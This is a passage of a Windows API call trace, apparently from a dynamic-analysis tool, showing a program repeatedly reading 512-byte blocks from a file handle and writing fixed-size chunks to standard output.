_get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] GetFileType (hFile=0x50) returned 0x1 [0162.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.962] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.963] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0162.963] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] GetFileType (hFile=0x50) returned 0x1 [0162.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.963] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] 
GetFileType (hFile=0x50) returned 0x1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.964] GetFileType (hFile=0x50) returned 0x1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] GetFileType (hFile=0x50) returned 0x1 [0162.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.965] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.966] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.966] GetFileType (hFile=0x50) returned 0x1 [0162.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.967] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | 
out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.968] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, 
lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.970] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] GetFileType (hFile=0x50) returned 0x1 [0162.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.970] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 
[0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) 
returned 1 [0162.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.971] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] GetFileType (hFile=0x50) returned 0x1 [0162.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.971] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.972] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.972] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] GetFileType (hFile=0x50) returned 0x1 [0162.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.972] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, 
lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.973] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.973] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] GetFileType (hFile=0x50) returned 0x1 [0162.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.973] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.974] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] GetFileType (hFile=0x50) returned 0x1 [0162.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.974] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, 
lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.975] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.975] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.975] GetFileType (hFile=0x50) returned 0x1 [0162.975] _get_osfhandle (_FileHandle=1) returned 0x50 